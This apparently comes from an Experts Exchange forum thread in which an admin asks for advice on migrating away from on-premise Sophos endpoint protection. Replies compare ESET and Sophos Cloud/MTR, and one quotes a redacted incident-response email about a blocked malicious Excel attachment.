Endpoint migration project
HelloWe are looking at either upgrading our existing on premise endpoint protection or migrating to another provider. Just wanted some ideas/feedback from those who have hopefully used some or all of the below?
Currently using Sophos enterprise console 5 (on prem only), features used:
AV,
Firewall
tamper,
Application control
Data control
Device control
exploit
Not using:
patch
web
Have reviewed bit defender some years ago and we liked it a lot, but was missing firewall. since then it appears all the vendors out there dont have their own FW, but use Windows one.
We would like to continue with the current features where possible, possibly add patch and some form of blocking exe's and msi's from the web if possible..
We have shortlisted the following:
Bit defender - ultra or elite
Checkpoint - not sure which version
crowdstrike (seems pricey)
sophos cloud
Any suggestions?
Thanks
Currently using Sophos enterprise console 5 (on prem only), features used:
AV,
Firewall
tamper,
Application control
Data control
Device control
exploit
Not using:
patch
web
Have reviewed bit defender some years ago and we liked it a lot, but was missing firewall. since then it appears all the vendors out there dont have their own FW, but use Windows one.
We would like to continue with the current features where possible, possibly add patch and some form of blocking exe's and msi's from the web if possible..
We have shortlisted the following:
Bit defender - ultra or elite
Checkpoint - not sure which version
crowdstrike (seems pricey)
sophos cloud
Any suggestions?
Thanks
strivoli
I use ESET and it does a very good job. I didn't notice if it includes FW functionality since I use Windows built in FW.
"ESET Endpoint Security" includes a Firewall.
ASKER
Its own firewall or leverages windows one with eset policies?
AFAIK its own.
ASKER
Does it cover all the other modules?
tamper,
Application control
Data control
Device control
exploit
patch
web
tamper,
Application control
Data control
Device control
exploit
patch
web
The Link allows you to download a PDF that should give you some answers:
https://www.eset.com/fileadmin/ESET/INT/Products/Business/Endpoint/Endpoint/EES-Windows/v07/ESET_Endpoint_Solutions_Product_Overview.pdf
https://www.eset.com/fileadmin/ESET/INT/Products/Business/Endpoint/Endpoint/EES-Windows/v07/ESET_Endpoint_Solutions_Product_Overview.pdf
We moved from Sophos on-prem to Sophos Cloud with Intercept-X and now Sophos MTR. So far we are really impressed. Here is an email we got recently regarding some activity. Some machine specific details have been changed.
The EDR and MTR products capture process activity on the endpoint, do you can see what happened. No more guessing if there is ongoing malicious activity. You can run commands on the remote endpoint as the system account to perform remediation, as can the Sophos MTR team if you get MTR. With MTR you get automated and proactive threat hunting. They told us about a scheduled task on another machine that I believe was running vbscript to execute powershell to try to download something from a web site. Very naughty behavior, but not something that regular AV can catch, as all of the programs are allowed.
--------------------------
user@sophos.com
Mar 10, 8:20 pm +0000
Team,
Case ID: 2-0000
Customer: My Company
Date: 2021-03-10 13:26:57 UTC
Associated Host:
Host: PC001
IP: 192.168.4.18
MAC: 00:b1:1c:38:9d:ab
User: user1
// Analysis:
On March 10th 2021, the Sophos MTR team responded to a detection for malicious activity on the host PC001 (HPmal/Crushr-BJ) . After review we determined that the user opened a zip archive from an outlook email that contained a malicious excel document. Sophos prevented the execution of the malicious content and no follow up activity was observed.
Additionally we did not find any persistency or other indictors of compromise on the hosts. At this time, we recommend performing the below-referenced remediation steps. If you have any questions regarding this escalation, please reply to this email.
// Recommendations:
Submit the zip archive to SophosLabs
• https://support.sophos.com/support/s/filesubmission?language=en_US
Delete the zip archive from disk
• C:\Users\user1\AppData\Loc
// Technical Details:
Detection ID: SOPHOS-SAV-HPmal-Crushr-BJ
Name: Sophos Events Queries
Description: This detection is part of HIPS. This detection type is made by collating run-time process behaviors and then processing them through the Sophos Anti-Virus engine as they occur, aiming to make a qualified malicious detection.
Zip Archive: C:\Users\user1\AppData\Loc
Excel Document: comission_2117721587_03172
The EDR and MTR products capture process activity on the endpoint, do you can see what happened. No more guessing if there is ongoing malicious activity. You can run commands on the remote endpoint as the system account to perform remediation, as can the Sophos MTR team if you get MTR. With MTR you get automated and proactive threat hunting. They told us about a scheduled task on another machine that I believe was running vbscript to execute powershell to try to download something from a web site. Very naughty behavior, but not something that regular AV can catch, as all of the programs are allowed.
--------------------------
user@sophos.com
Mar 10, 8:20 pm +0000
Team,
Case ID: 2-0000
Customer: My Company
Date: 2021-03-10 13:26:57 UTC
Associated Host:
Host: PC001
IP: 192.168.4.18
MAC: 00:b1:1c:38:9d:ab
User: user1
// Analysis:
On March 10th 2021, the Sophos MTR team responded to a detection for malicious activity on the host PC001 (HPmal/Crushr-BJ) . After review we determined that the user opened a zip archive from an outlook email that contained a malicious excel document. Sophos prevented the execution of the malicious content and no follow up activity was observed.
Additionally we did not find any persistency or other indictors of compromise on the hosts. At this time, we recommend performing the below-referenced remediation steps. If you have any questions regarding this escalation, please reply to this email.
// Recommendations:
Submit the zip archive to SophosLabs
• https://support.sophos.com/support/s/filesubmission?language=en_US
Delete the zip archive from disk
• C:\Users\user1\AppData\Loc
// Technical Details:
Detection ID: SOPHOS-SAV-HPmal-Crushr-BJ
Name: Sophos Events Queries
Description: This detection is part of HIPS. This detection type is made by collating run-time process behaviors and then processing them through the Sophos Anti-Virus engine as they occur, aiming to make a qualified malicious detection.
Zip Archive: C:\Users\user1\AppData\Loc
Excel Document: comission_2117721587_03172
ASKER
MTR being what most call EDR?
MTR being what most call EDR?
No, MTR is Managed Threat Response. MTR is EDR+Managed service.
EDR is when you do all of the work yourself using the same endpoint agent.
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.